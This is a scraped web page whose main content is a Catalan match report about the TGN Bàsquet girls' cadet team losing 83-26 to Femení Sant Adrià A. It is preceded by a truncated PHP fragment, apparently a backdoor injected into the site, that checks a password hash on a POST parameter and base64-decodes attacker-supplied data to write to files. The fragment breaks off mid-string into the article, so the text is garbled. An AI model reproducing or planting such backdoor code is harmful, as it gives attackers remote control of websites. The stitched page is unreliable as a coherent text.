function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05 A no pot amb el gran potencial d'un dels favorits al títol, el Femení Sant Adrià A i encaixa una derrota contundent (83-26) - Tgn Bàsquet Club -

El Cadet femení 05 A no pot amb el gran potencial d’un dels favorits al títol, el Femení Sant Adrià A i encaixa una derrota contundent (83-26)

Updated: març 6, 2021

El Cadet femení 05 A ha estat víctima d’un rival molt superior, el Femení Sant Adrià A, i ha caigut de forma clara en el seu primer partit de lliga de categoria Preferent A. Les noies que entrena Albert del Rey han plantat cara en els primers minuts (8-2, minut 4) però en el moment que les locals han començat a tenir encert, el partit s’ha acabat.

El Femení Sant Adrià A és un equip format per un grup de jugadores que fa un parell d’anys es va proclamar campió d’Espanya infantil, és a dir, es tracta d’un conjunt superlatiu —en l’aspecte tècnic, però també físic— que ha fet valer la seva llei des de l’equador del primer quart.

El TGN Bàsquet ha tingut moltes dificultats per aturar el joc de les dues interiors del Femení Sant Adrià A, Guillén i Clement, que s’obrien a l’exterior de la zona i jugaven de cara a cistella, provocant dubtes a l’hora de fer els canvis defensius. Els desequilibris generats per aquestes dues jugadores han permès les seves companyes trobar forats en la defensa tarragonina que ha finalitzat el quart amb desavantatge de 23-9.

Des de llavors, ha estat un monòleg de les locals que, a còpia d’una defensa individual i pressionant a tota la pista, han asfixiat el joc ofensiu del TGN Bàsquet. Les visitants han estat capaces, però, de superar en molts moments els constants dos contra un de les seves rivals, però els ha faltat energia i encert per a culminar algunes jugades en superioritat (46-15 al descans).

De fet, la precipitació ha estat un dels grans problemes de les tarragonines que, en un partit a camp obert, han volgut córrer tal com feia el seu adversari, i això ha agreujat el problema perquè la capacitat física de les locals per ocupar espais i creuar la pista les ha permès recuperar pilotes i anotar en transició, augmentant les diferències de forma irreparable.